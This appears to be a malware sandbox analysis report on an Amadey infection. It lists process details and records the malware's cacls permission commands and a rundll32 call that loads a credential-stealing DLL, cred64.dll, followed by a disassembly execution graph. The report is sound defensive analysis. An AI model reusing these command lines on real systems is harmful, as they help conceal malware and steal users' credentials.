                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:13
                                            Start time:10:40:18
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\cacls.exe
                                            Wow64 process (32bit):true
                                            Commandline:CACLS "gntuud.exe" /P "user:N"
                                            Imagebase:0x1200000
                                            File size:27648 bytes
                                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Target ID:14
                                            Start time:10:40:18
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\cacls.exe
                                            Wow64 process (32bit):true
                                            Commandline:CACLS "gntuud.exe" /P "user:R" /E
                                            Imagebase:0x1200000
                                            File size:27648 bytes
                                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Target ID:15
                                            Start time:10:40:19
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                            Imagebase:0xd90000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Target ID:16
                                            Start time:10:40:19
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\cacls.exe
                                            Wow64 process (32bit):true
                                            Commandline:CACLS "..\03bd543fce" /P "user:N"
                                            Imagebase:0x1200000
                                            File size:27648 bytes
                                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Target ID:17
                                            Start time:10:40:19
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\cacls.exe
                                            Wow64 process (32bit):true
                                            Commandline:CACLS "..\03bd543fce" /P "user:R" /E
                                            Imagebase:0x1200000
                                            File size:27648 bytes
                                            MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            General

                                            Target ID:18
                                            Start time:10:40:20
                                            Start date:09/12/2022
                                            Path:C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe
                                            Imagebase:0xa0000
                                            File size:7732440 bytes
                                            MD5 hash:2239A58CC93FD94DC2806CE7F6AF0A0B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000012.00000002.518241260.00000000000A1000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security

                                            General

                                            Target ID:19
                                            Start time:10:40:22
                                            Start date:09/12/2022
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, Main
                                            Imagebase:0xf10000
                                            File size:61952 bytes
                                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:Borland Delphi

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:11.4%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:13.9%
                                              Total number of Nodes:1162
                                              Total number of Limit Nodes:12
                                              execution_graph 6426 ecce6d 6429 eca8d1 LeaveCriticalSection 6426->6429 6428 ecce74 6429->6428 6430 eca168 6431 eca174 __mtinitlocknum 6430->6431 6432 ecbece __mtinitlocknum 68 API calls 6431->6432 6434 eca18c 6431->6434 6463 eca276 __mtinitlocknum 6431->6463 6432->6434 6433 eca19a 6435 eca1a8 6433->6435 6437 ecbece __mtinitlocknum 68 API calls 6433->6437 6434->6433 6436 ecbece __mtinitlocknum 68 API calls 6434->6436 6438 eca1b6 6435->6438 6439 ecbece __mtinitlocknum 68 API calls 6435->6439 6436->6433 6437->6435 6440 eca1c4 6438->6440 6441 ecbece __mtinitlocknum 68 API calls 6438->6441 6439->6438 6442 eca1d2 6440->6442 6444 ecbece __mtinitlocknum 68 API calls 6440->6444 6441->6440 6443 eca1e0 6442->6443 6445 ecbece __mtinitlocknum 68 API calls 6442->6445 6446 eca1f1 6443->6446 6447 ecbece __mtinitlocknum 68 API calls 6443->6447 6444->6442 6445->6443 6448 eca9ab __lock 68 API calls 6446->6448 6447->6446 6449 eca1f9 6448->6449 6450 eca21e 6449->6450 6451 eca205 InterlockedDecrement 6449->6451 6466 eca282 6450->6466 6451->6450 6453 eca210 6451->6453 6453->6450 6456 ecbece __mtinitlocknum 68 API calls 6453->6456 6455 eca9ab __lock 68 API calls 6457 eca232 6455->6457 6456->6450 6458 eca263 6457->6458 6469 ecc60d 6457->6469 6513 eca28e 6458->6513 6462 ecbece __mtinitlocknum 68 API calls 6462->6463 6516 eca8d1 LeaveCriticalSection 6466->6516 6468 eca22b 6468->6455 6470 ecc61e InterlockedDecrement 6469->6470 6471 eca247 6469->6471 6472 ecc636 6470->6472 6473 ecc633 InterlockedDecrement 6470->6473 6471->6458 6483 ecc435 6471->6483 6474 ecc640 InterlockedDecrement 6472->6474 6475 ecc643 6472->6475 6473->6472 6474->6475 6476 ecc64d InterlockedDecrement 6475->6476 6477 ecc650 6475->6477 6476->6477 6478 ecc65a InterlockedDecrement 6477->6478 6479 ecc65d 6477->6479 6478->6479 6480 ecc676 InterlockedDecrement 6479->6480 6481 ecc686 InterlockedDecrement 6479->6481 6482 ecc691 InterlockedDecrement 6479->6482 6480->6479 6481->6479 6482->6471 6484 ecc4b9 6483->6484 6489 ecc44c 6483->6489 6485 ecc506 6484->6485 6486 ecbece __mtinitlocknum 68 API calls 6484->6486 6502 ecc52d 6485->6502 6541 ecdbc6 6485->6541 6488 ecc4da 6486->6488 6493 ecbece __mtinitlocknum 68 API calls 6488->6493 6489->6484 6491 ecc480 6489->6491 6496 ecbece __mtinitlocknum 68 API calls 6489->6496 6492 ecc4a1 6491->6492 6503 ecbece __mtinitlocknum 68 API calls 6491->6503 6494 ecbece __mtinitlocknum 68 API calls 6492->6494 6498 ecc4ed 6493->6498 6499 ecc4ae 6494->6499 6495 ecc572 6500 ecbece __mtinitlocknum 68 API calls 6495->6500 6501 ecc475 6496->6501 6497 ecbece __mtinitlocknum 68 API calls 6497->6502 6505 ecbece __mtinitlocknum 68 API calls 6498->6505 6506 ecbece __mtinitlocknum 68 API calls 6499->6506 6507 ecc578 6500->6507 6517 ecdda0 6501->6517 6502->6495 6504 ecbece 68 API calls __mtinitlocknum 6502->6504 6509 ecc496 6503->6509 6504->6502 6510 ecc4fb 6505->6510 6506->6484 6507->6458 6533 ecdd5b 6509->6533 6512 ecbece __mtinitlocknum 68 API calls 6510->6512 6512->6485 6629 eca8d1 LeaveCriticalSection 6513->6629 6515 eca270 6515->6462 6516->6468 6518 ecddad 6517->6518 6519 ecde2a 6517->6519 6520 ecddbe 6518->6520 6521 ecbece __mtinitlocknum 68 API calls 6518->6521 6519->6491 6522 ecddd0 6520->6522 6523 ecbece __mtinitlocknum 68 API calls 6520->6523 6521->6520 6524 ecdde2 6522->6524 6525 ecbece __mtinitlocknum 68 API calls 6522->6525 6523->6522 6526 ecddf4 6524->6526 6527 ecbece __mtinitlocknum 68 API calls 6524->6527 6525->6524 6528 ecde06 6526->6528 6529 ecbece __mtinitlocknum 68 API calls 6526->6529 6527->6526 6530 ecde18 6528->6530 6531 ecbece __mtinitlocknum 68 API calls 6528->6531 6529->6528 6530->6519 6532 ecbece __mtinitlocknum 68 API calls 6530->6532 6531->6530 6532->6519 6534 ecdd68 6533->6534 6540 ecdd9c 6533->6540 6535 ecdd78 6534->6535 6536 ecbece __mtinitlocknum 68 API calls 6534->6536 6537 ecbece __mtinitlocknum 68 API calls 6535->6537 6538 ecdd8a 6535->6538 6536->6535 6537->6538 6539 ecbece __mtinitlocknum 68 API calls 6538->6539 6538->6540 6539->6540 6540->6492 6542 ecdbd7 6541->6542 6628 ecc526 6541->6628 6543 ecbece __mtinitlocknum 68 API calls 6542->6543 6544 ecdbdf 6543->6544 6545 ecbece __mtinitlocknum 68 API calls 6544->6545 6546 ecdbe7 6545->6546 6547 ecbece __mtinitlocknum 68 API calls 6546->6547 6548 ecdbef 6547->6548 6549 ecbece __mtinitlocknum 68 API calls 6548->6549 6550 ecdbf7 6549->6550 6551 ecbece __mtinitlocknum 68 API calls 6550->6551 6552 ecdbff 6551->6552 6553 ecbece __mtinitlocknum 68 API calls 6552->6553 6554 ecdc07 6553->6554 6555 ecbece __mtinitlocknum 68 API calls 6554->6555 6556 ecdc0e 6555->6556 6557 ecbece __mtinitlocknum 68 API calls 6556->6557 6558 ecdc16 6557->6558 6559 ecbece __mtinitlocknum 68 API calls 6558->6559 6560 ecdc1e 6559->6560 6561 ecbece __mtinitlocknum 68 API calls 6560->6561 6562 ecdc26 6561->6562 6563 ecbece __mtinitlocknum 68 API calls 6562->6563 6564 ecdc2e 6563->6564 6565 ecbece __mtinitlocknum 68 API calls 6564->6565 6566 ecdc36 6565->6566 6567 ecbece __mtinitlocknum 68 API calls 6566->6567 6568 ecdc3e 6567->6568 6569 ecbece __mtinitlocknum 68 API calls 6568->6569 6570 ecdc46 6569->6570 6571 ecbece __mtinitlocknum 68 API calls 6570->6571 6572 ecdc4e 6571->6572 6573 ecbece __mtinitlocknum 68 API calls 6572->6573 6574 ecdc56 6573->6574 6575 ecbece __mtinitlocknum 68 API calls 6574->6575 6576 ecdc61 6575->6576 6577 ecbece __mtinitlocknum 68 API calls 6576->6577 6578 ecdc69 6577->6578 6579 ecbece __mtinitlocknum 68 API calls 6578->6579 6580 ecdc71 6579->6580 6581 ecbece __mtinitlocknum 68 API calls 6580->6581 6582 ecdc79 6581->6582 6583 ecbece __mtinitlocknum 68 API calls 6582->6583 6584 ecdc81 6583->6584 6585 ecbece __mtinitlocknum 68 API calls 6584->6585 6586 ecdc89 6585->6586 6587 ecbece __mtinitlocknum 68 API calls 6586->6587 6588 ecdc91 6587->6588 6589 ecbece __mtinitlocknum 68 API calls 6588->6589 6590 ecdc99 6589->6590 6591 ecbece __mtinitlocknum 68 API calls 6590->6591 6592 ecdca1 6591->6592 6593 ecbece __mtinitlocknum 68 API calls 6592->6593 6594 ecdca9 6593->6594 6595 ecbece __mtinitlocknum 68 API calls 6594->6595 6596 ecdcb1 6595->6596 6597 ecbece __mtinitlocknum 68 API calls 6596->6597 6598 ecdcb9 6597->6598 6599 ecbece __mtinitlocknum 68 API calls 6598->6599 6600 ecdcc1 6599->6600 6601 ecbece __mtinitlocknum 68 API calls 6600->6601 6602 ecdcc9 6601->6602 6603 ecbece __mtinitlocknum 68 API calls 6602->6603 6604 ecdcd1 6603->6604 6605 ecbece __mtinitlocknum 68 API calls 6604->6605 6606 ecdcd9 6605->6606 6607 ecbece __mtinitlocknum 68 API calls 6606->6607 6608 ecdce7 6607->6608 6609 ecbece __mtinitlocknum 68 API calls 6608->6609 6610 ecdcf2 6609->6610 6611 ecbece __mtinitlocknum 68 API calls 6610->6611 6612 ecdcfd 6611->6612 6613 ecbece __mtinitlocknum 68 API calls 6612->6613 6614 ecdd08 6613->6614 6615 ecbece __mtinitlocknum 68 API calls 6614->6615 6616 ecdd13 6615->6616 6617 ecbece __mtinitlocknum 68 API calls 6616->6617 6618 ecdd1e 6617->6618 6619 ecbece __mtinitlocknum 68 API calls 6618->6619 6620 ecdd29 6619->6620 6621 ecbece __mtinitlocknum 68 API calls 6620->6621 6622 ecdd34 6621->6622 6623 ecbece __mtinitlocknum 68 API calls 6622->6623 6624 ecdd3f 6623->6624 6625 ecbece __mtinitlocknum 68 API calls 6624->6625 6626 ecdd4a 6625->6626 6627 ecbece __mtinitlocknum 68 API calls 6626->6627 6627->6628 6628->6497 6629->6515 6630 ec4269 6631 ec4270 6630->6631 6632 ec4710 GetSystemDefaultLangID 6631->6632 6634 ec472e 6632->6634 6633 ec48f3 IsZoomed 6633->6634 6634->6633 6635 ec4b9d 6634->6635 6636 ec4df9 FoldStringW 6635->6636 6637 ec4e39 6636->6637 6638 ec4eb3 6636->6638 6639 ec4ed6 CoUninitialize 6637->6639 6640 ec4e57 CoUninitialize 6637->6640 6638->6639 6643 ec5514 6639->6643 6640->6643 6641 ec56d5 SetLastError GetLastError 6642 ec58df HeapCreate 6641->6642 6650 ec56f2 6641->6650 6645 ec5952 6642->6645 6643->6641 6647 ec598e GetProcAddress 6645->6647 6646 ec5892 GetConsoleCP GetLastError 6646->6642 6646->6650 6648 ec7878 6647->6648 6649 ec5a92 Sleep RtlAllocateHeap 6647->6649 6653 ec5ba8 6649->6653 6650->6646 6651 ec588b SetLastError 6650->6651 6651->6646 6653->6648 6654 ec8e37 _calloc 68 API calls 6653->6654 6655 ec5cd2 6654->6655 6656 eccf64 6657 eccf76 6656->6657 6659 eccf84 @_EH4_CallFilterFunc@8 6656->6659 6658 eccec4 __crtGetStringTypeA_stat 5 API calls 6657->6658 6658->6659 6297 ec68a5 6298 ec68b0 6297->6298 6299 ec7867 GetForegroundWindow MessageBoxW 6298->6299 6300 ec7878 6299->6300 6825 eccb27 6835 eccaab 6825->6835 6828 eccb52 setSBCS 6829 eccec4 __crtGetStringTypeA_stat 5 API calls 6828->6829 6831 eccd0a 6829->6831 6830 eccb96 IsValidCodePage 6830->6828 6832 eccba8 GetCPInfo 6830->6832 6832->6828 6833 eccbbb _memset __setmbcp_nolock 6832->6833 6842 ecc7ed GetCPInfo 6833->6842 6836 ecca24 _LocaleUpdate::_LocaleUpdate 78 API calls 6835->6836 6837 eccabf 6836->6837 6838 eccae8 6837->6838 6839 eccaca GetOEMCP 6837->6839 6840 eccaed GetACP 6838->6840 6841 eccada 6838->6841 6839->6841 6840->6841 6841->6828 6841->6830 6841->6833 6844 ecc821 _memset 6842->6844 6851 ecc8d3 6842->6851 6843 ece0c2 ___crtGetStringTypeA 92 API calls 6845 ecc88e 6843->6845 6844->6843 6852 ece4f5 6845->6852 6846 eccec4 __crtGetStringTypeA_stat 5 API calls 6848 ecc97e 6846->6848 6848->6833 6850 ece4f5 ___crtLCMapStringA 97 API calls 6850->6851 6851->6846 6853 ecca24 _LocaleUpdate::_LocaleUpdate 78 API calls 6852->6853 6854 ece508 6853->6854 6857 ece150 6854->6857 6858 ece171 LCMapStringW 6857->6858 6861 ece18c 6857->6861 6859 ece194 GetLastError 6858->6859 6858->6861 6859->6861 6860 ece38a 6863 ece8aa ___ansicp 6 API calls 6860->6863 6861->6860 6862 ece1e6 6861->6862 6864 ece1ff MultiByteToWideChar 6862->6864 6886 ece381 6862->6886 6866 ece3b2 6863->6866 6870 ece22c 6864->6870 6864->6886 6865 eccec4 __crtGetStringTypeA_stat 5 API calls 6867 ecc8ae 6865->6867 6868 ece3cb 6866->6868 6869 ece4a6 LCMapStringA 6866->6869 6866->6886 6867->6850 6871 ece8f3 ___convertcp 75 API calls 6868->6871 6903 ece402 6869->6903 6875 ecd777 _malloc 68 API calls 6870->6875 6882 ece245 6870->6882 6876 ece3dd 6871->6876 6872 ece27d MultiByteToWideChar 6873 ece296 LCMapStringW 6872->6873 6898 ece378 6872->6898 6877 ece2b7 6873->6877 6873->6898 6874 ece4cd 6884 ecbece __mtinitlocknum 68 API calls 6874->6884 6874->6886 6875->6882 6879 ece3e7 LCMapStringA 6876->6879 6876->6886 6881 ece2c0 6877->6881 6888 ece2e9 6877->6888 6878 ecbece __mtinitlocknum 68 API calls 6878->6874 6890 ece409 6879->6890 6879->6903 6880 ecd708 __freea 68 API calls 6880->6886 6885 ece2d2 LCMapStringW 6881->6885 6881->6898 6882->6872 6882->6886 6883 ece304 6887 ece338 LCMapStringW 6883->6887 6883->6898 6884->6886 6885->6898 6886->6865 6891 ece350 WideCharToMultiByte 6887->6891 6892 ece372 6887->6892 6888->6883 6894 ecd777 _malloc 68 API calls 6888->6894 6889 ece41a _memset 6896 ece458 LCMapStringA 6889->6896 6889->6903 6890->6889 6893 ecd777 _malloc 68 API calls 6890->6893 6891->6892 6895 ecd708 __freea 68 API calls 6892->6895 6893->6889 6894->6883 6895->6898 6899 ece478 6896->6899 6900 ece474 6896->6900 6898->6880 6901 ece8f3 ___convertcp 75 API calls 6899->6901 6902 ecd708 __freea 68 API calls 6900->6902 6901->6900 6902->6903 6903->6874 6903->6878 5524 ec8ea0 5561 eca454 5524->5561 5526 ec8eac GetStartupInfoW 5528 ec8ecf 5526->5528 5562 eca424 HeapCreate 5528->5562 5530 ec8f1f 5564 eca297 GetModuleHandleW 5530->5564 5534 ec8f30 __RTC_Initialize 5598 ec9be7 5534->5598 5535 ec8e77 _fast_error_exit 68 API calls 5535->5534 5537 ec8f3e 5538 ec8f4a GetCommandLineW 5537->5538 5664 ec921a 5537->5664 5613 ec9b8a GetEnvironmentStringsW 5538->5613 5542 ec8f59 5619 ec9adc GetModuleFileNameW 5542->5619 5544 ec8f63 5545 ec8f6e 5544->5545 5546 ec921a __amsg_exit 68 API calls 5544->5546 5623 ec98ad 5545->5623 5546->5545 5549 ec8f7f 5636 ec92d9 5549->5636 5550 ec921a __amsg_exit 68 API calls 5550->5549 5552 ec8f86 5553 ec921a __amsg_exit 68 API calls 5552->5553 5554 ec8f91 __wwincmdln 5552->5554 5553->5554 5642 ec81d0 5554->5642 5556 ec8fb2 5557 ec8fc0 5556->5557 5671 ec948a 5556->5671 5674 ec94b6 5557->5674 5560 ec8fc5 __mtinitlocknum 5561->5526 5563 ec8f13 5562->5563 5563->5530 5656 ec8e77 5563->5656 5565 eca2ab 5564->5565 5566 eca2b2 5564->5566 5567 ec91ea __crt_waiting_on_module_handle 2 API calls 5565->5567 5568 eca2bc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 5566->5568 5569 eca41a 5566->5569 5570 eca2b1 5567->5570 5571 eca305 TlsAlloc 5568->5571 5722 ec9fb1 5569->5722 5570->5566 5573 ec8f25 5571->5573 5575 eca353 TlsSetValue 5571->5575 5573->5534 5573->5535 5575->5573 5576 eca364 5575->5576 5677 ec94d4 5576->5677 5579 ec9e87 __encode_pointer 7 API calls 5580 eca374 5579->5580 5581 ec9e87 __encode_pointer 7 API calls 5580->5581 5582 eca384 5581->5582 5583 ec9e87 __encode_pointer 7 API calls 5582->5583 5584 eca394 5583->5584 5585 ec9e87 __encode_pointer 7 API calls 5584->5585 5586 eca3a4 5585->5586 5684 eca82f 5586->5684 5593 ec9f02 __decode_pointer 6 API calls 5594 eca3f8 5593->5594 5594->5569 5595 eca3ff 5594->5595 5704 ec9fee 5595->5704 5597 eca407 GetCurrentThreadId 5597->5573 6055 eca454 5598->6055 5600 ec9bf3 GetStartupInfoA 5601 ecc010 __calloc_crt 68 API calls 5600->5601 5609 ec9c14 5601->5609 5602 ec9e32 __mtinitlocknum 5602->5537 5603 ec9cfc 5603->5602 5606 ec9d79 5603->5606 5611 ec9d25 GetFileType 5603->5611 5612 ecba9c __mtinitlocknum InitializeCriticalSectionAndSpinCount 5603->5612 5604 ec9daf GetStdHandle 5604->5606 5605 ec9e14 SetHandleCount 5605->5602 5606->5602 5606->5604 5606->5605 5608 ec9dc1 GetFileType 5606->5608 5610 ecba9c __mtinitlocknum InitializeCriticalSectionAndSpinCount 5606->5610 5607 ecc010 __calloc_crt 68 API calls 5607->5609 5608->5606 5609->5602 5609->5603 5609->5606 5609->5607 5610->5606 5611->5603 5612->5603 5614 ec9b9f 5613->5614 5615 ec9b9b 5613->5615 5616 ecbfcb __malloc_crt 68 API calls 5614->5616 5615->5542 5618 ec9bc0 _realloc 5616->5618 5617 ec9bc7 FreeEnvironmentStringsW 5617->5542 5618->5617 5620 ec9b11 _wparse_cmdline 5619->5620 5621 ecbfcb __malloc_crt 68 API calls 5620->5621 5622 ec9b54 _wparse_cmdline 5620->5622 5621->5622 5622->5544 5624 ec98c5 _wcslen 5623->5624 5626 ec8f74 5623->5626 5625 ecc010 __calloc_crt 68 API calls 5624->5625 5629 ec98e9 _wcslen 5625->5629 5626->5549 5626->5550 5627 ec994e 5628 ecbece __mtinitlocknum 68 API calls 5627->5628 5628->5626 5629->5626 5629->5627 5630 ecc010 __calloc_crt 68 API calls 5629->5630 5631 ec9974 5629->5631 5634 ec9933 5629->5634 6056 ecbf5c 5629->6056 5630->5629 5632 ecbece __mtinitlocknum 68 API calls 5631->5632 5632->5626 5634->5629 5635 eca6e1 __invoke_watson 10 API calls 5634->5635 5635->5634 5638 ec92e7 __IsNonwritableInCurrentImage 5636->5638 6065 ecb6e6 5638->6065 5639 ec9305 __initterm_e 5641 ec9324 __IsNonwritableInCurrentImage __initterm 5639->5641 6069 ecb6cf 5639->6069 5641->5552 5643 ec8356 5642->5643 5644 ec850c lstrlenA 5643->5644 5645 ec8536 5644->5645 5646 ec89aa GetSystemDefaultLangID SetLastError GetLastError 5645->5646 5653 ec8e0d 5645->5653 5647 ec8a59 _memset 5646->5647 5648 ec8a11 5646->5648 5649 ec8a89 GetCurrentDirectoryW 5647->5649 5648->5647 5650 ec8a4d InterlockedIncrement GetLastError 5648->5650 5651 ec8e08 5649->5651 5654 ec8ac7 5649->5654 5650->5647 5650->5648 6169 ec78c0 5651->6169 5653->5556 5654->5651 5655 ec8df7 GetACP 5654->5655 5655->5651 5657 ec8e8a 5656->5657 5658 ec8e85 5656->5658 5660 ec9522 __NMSG_WRITE 68 API calls 5657->5660 5659 ec96cd __FF_MSGBANNER 68 API calls 5658->5659 5659->5657 5661 ec8e92 5660->5661 5662 ec926e __mtinitlocknum 3 API calls 5661->5662 5663 ec8e9c 5662->5663 5663->5530 5665 ec96cd __FF_MSGBANNER 68 API calls 5664->5665 5666 ec9224 5665->5666 5667 ec9522 __NMSG_WRITE 68 API calls 5666->5667 5668 ec922c 5667->5668 5669 ec9f02 __decode_pointer 6 API calls 5668->5669 5670 ec8f49 5669->5670 5670->5538 6224 ec935e 5671->6224 5673 ec949b 5673->5557 5675 ec935e _doexit 68 API calls 5674->5675 5676 ec94c1 5675->5676 5676->5560 5733 ec9ef9 5677->5733 5679 ec94dc __init_pointers __initp_misc_winsig 5736 ecb597 5679->5736 5682 ec9e87 __encode_pointer 7 API calls 5683 ec9518 5682->5683 5683->5579 5685 eca83a 5684->5685 5687 eca3b1 5685->5687 5739 ecba9c 5685->5739 5687->5569 5688 ec9f02 TlsGetValue 5687->5688 5689 ec9f1a 5688->5689 5690 ec9f3b GetModuleHandleW 5688->5690 5689->5690 5691 ec9f24 TlsGetValue 5689->5691 5692 ec9f4b 5690->5692 5693 ec9f56 GetProcAddress 5690->5693 5697 ec9f2f 5691->5697 5694 ec91ea __crt_waiting_on_module_handle 2 API calls 5692->5694 5695 ec9f33 5693->5695 5696 ec9f51 5694->5696 5695->5569 5698 ecc010 5695->5698 5696->5693 5696->5695 5697->5690 5697->5695 5700 ecc019 5698->5700 5701 eca3de 5700->5701 5702 ecc037 Sleep 5700->5702 5744 ec907c 5700->5744 5701->5569 5701->5593 5703 ecc04c 5702->5703 5703->5700 5703->5701 6034 eca454 5704->6034 5706 ec9ffa GetModuleHandleW 5707 eca00a 5706->5707 5708 eca010 5706->5708 5709 ec91ea __crt_waiting_on_module_handle 2 API calls 5707->5709 5710 eca04c 5708->5710 5711 eca028 GetProcAddress GetProcAddress 5708->5711 5709->5708 5712 eca9ab __lock 64 API calls 5710->5712 5711->5710 5713 eca06b InterlockedIncrement 5712->5713 6035 eca0c3 5713->6035 5716 eca9ab __lock 64 API calls 5717 eca08c 5716->5717 6038 ecc57e InterlockedIncrement 5717->6038 5719 eca0aa 6050 eca0cc 5719->6050 5721 eca0b7 __mtinitlocknum 5721->5597 5723 ec9fbb 5722->5723 5724 ec9fc7 5722->5724 5727 ec9f02 __decode_pointer 6 API calls 5723->5727 5725 ec9fe9 5724->5725 5726 ec9fdb TlsFree 5724->5726 5728 eca896 DeleteCriticalSection 5725->5728 5730 eca8ae 5725->5730 5726->5725 5727->5724 5729 ecbece __mtinitlocknum 68 API calls 5728->5729 5729->5725 5731 eca8ce 5730->5731 5732 eca8c0 DeleteCriticalSection 5730->5732 5731->5573 5732->5730 5734 ec9e87 __encode_pointer 7 API calls 5733->5734 5735 ec9f00 5734->5735 5735->5679 5737 ec9e87 __encode_pointer 7 API calls 5736->5737 5738 ec950e 5737->5738 5738->5682 5743 eca454 5739->5743 5741 ecbaa8 InitializeCriticalSectionAndSpinCount 5742 ecbaec __mtinitlocknum 5741->5742 5742->5685 5743->5741 5745 ec9088 __mtinitlocknum 5744->5745 5746 ec90a0 5745->5746 5756 ec90bf _memset 5745->5756 5757 ec9069 5746->5757 5750 ec9131 RtlAllocateHeap 5750->5756 5753 ec90b5 __mtinitlocknum 5753->5700 5756->5750 5756->5753 5763 eca9ab 5756->5763 5770 ecb279 5756->5770 5776 ec9178 5756->5776 5779 eca9ed 5756->5779 5782 eca0d5 GetLastError 5757->5782 5759 ec906e 5760 eca809 5759->5760 5761 ec9f02 __decode_pointer 6 API calls 5760->5761 5762 eca819 __invoke_watson 5761->5762 5764 eca9c0 5763->5764 5765 eca9d3 EnterCriticalSection 5763->5765 5829 eca8e8 5764->5829 5765->5756 5767 eca9c6 5767->5765 5768 ec921a __amsg_exit 67 API calls 5767->5768 5769 eca9d2 5768->5769 5769->5765 5772 ecb2a7 5770->5772 5771 ecb340 5775 ecb349 5771->5775 6029 ecae90 5771->6029 5772->5771 5772->5775 6022 ecade0 5772->6022 5775->5756 6033 eca8d1 LeaveCriticalSection 5776->6033 5778 ec917f 5778->5756 5780 ec9f02 __decode_pointer 6 API calls 5779->5780 5781 eca9fd 5780->5781 5781->5756 5796 ec9f7d TlsGetValue 5782->5796 5785 eca142 SetLastError 5785->5759 5786 ecc010 __calloc_crt 65 API calls 5787 eca100 5786->5787 5787->5785 5788 ec9f02 __decode_pointer 6 API calls 5787->5788 5789 eca11a 5788->5789 5790 eca139 5789->5790 5791 eca121 5789->5791 5801 ecbece 5790->5801 5792 ec9fee __mtinit 65 API calls 5791->5792 5794 eca129 GetCurrentThreadId 5792->5794 5794->5785 5795 eca13f 5795->5785 5797 ec9fad 5796->5797 5798 ec9f92 5796->5798 5797->5785 5797->5786 5799 ec9f02 __decode_pointer 6 API calls 5798->5799 5800 ec9f9d TlsSetValue 5799->5800 5800->5797 5804 ecbeda __mtinitlocknum 5801->5804 5802 ecbf53 _realloc __mtinitlocknum 5802->5795 5803 ecbf19 5803->5802 5805 ecbf2e HeapFree 5803->5805 5804->5802 5804->5803 5806 eca9ab __lock 66 API calls 5804->5806 5805->5802 5807 ecbf40 5805->5807 5810 ecbef1 ___sbh_find_block 5806->5810 5808 ec9069 __mtinitlocknum 66 API calls 5807->5808 5809 ecbf45 GetLastError 5808->5809 5809->5802 5813 ecbf0b 5810->5813 5814 ecaaca 5810->5814 5821 ecbf24 5813->5821 5815 ecab09 5814->5815 5816 ecadab 5814->5816 5815->5816 5817 ecacf5 VirtualFree 5815->5817 5816->5813 5818 ecad59 5817->5818 5818->5816 5819 ecad68 VirtualFree HeapFree 5818->5819 5824 ecd1e0 5819->5824 5828 eca8d1 LeaveCriticalSection 5821->5828 5823 ecbf2b 5823->5803 5825 ecd1f8 5824->5825 5826 ecd227 5825->5826 5827 ecd21f __VEC_memcpy 5825->5827 5826->5816 5827->5826 5828->5823 5830 eca8f4 __mtinitlocknum 5829->5830 5831 eca91a 5830->5831 5855 ec96cd 5830->5855 5839 eca92a __mtinitlocknum 5831->5839 5901 ecbfcb 5831->5901 5837 eca93c 5841 ec9069 __mtinitlocknum 68 API calls 5837->5841 5838 eca94b 5842 eca9ab __lock 68 API calls 5838->5842 5839->5767 5841->5839 5844 eca952 5842->5844 5845 eca95a 5844->5845 5846 eca986 5844->5846 5848 ecba9c __mtinitlocknum InitializeCriticalSectionAndSpinCount 5845->5848 5847 ecbece __mtinitlocknum 68 API calls 5846->5847 5849 eca977 5847->5849 5850 eca965 5848->5850 5907 eca9a2 5849->5907 5850->5849 5852 ecbece __mtinitlocknum 68 API calls 5850->5852 5853 eca971 5852->5853 5854 ec9069 __mtinitlocknum 68 API calls 5853->5854 5854->5849 5910 ecbe83 5855->5910 5858 ec96e1 5860 ec9522 __NMSG_WRITE 68 API calls 5858->5860 5862 ec9703 5858->5862 5859 ecbe83 __set_error_mode 68 API calls 5859->5858 5861 ec96f9 5860->5861 5863 ec9522 __NMSG_WRITE 68 API calls 5861->5863 5864 ec9522 5862->5864 5863->5862 5865 ec9536 5864->5865 5866 ecbe83 __set_error_mode 65 API calls 5865->5866 5897 ec9691 5865->5897 5867 ec9558 5866->5867 5868 ec9696 GetStdHandle 5867->5868 5870 ecbe83 __set_error_mode 65 API calls 5867->5870 5869 ec96a4 _strlen 5868->5869 5868->5897 5873 ec96bd WriteFile 5869->5873 5869->5897 5871 ec9569 5870->5871 5871->5868 5872 ec957b 5871->5872 5872->5897 5916 ecbe1b 5872->5916 5873->5897 5876 ec95b1 GetModuleFileNameA 5877 ec95cf 5876->5877 5882 ec95f2 _strlen 5876->5882 5880 ecbe1b _strcpy_s 65 API calls 5877->5880 5881 ec95df 5880->5881 5881->5882 5883 eca6e1 __invoke_watson 10 API calls 5881->5883 5893 ec9635 5882->5893 5932 ecbcd9 5882->5932 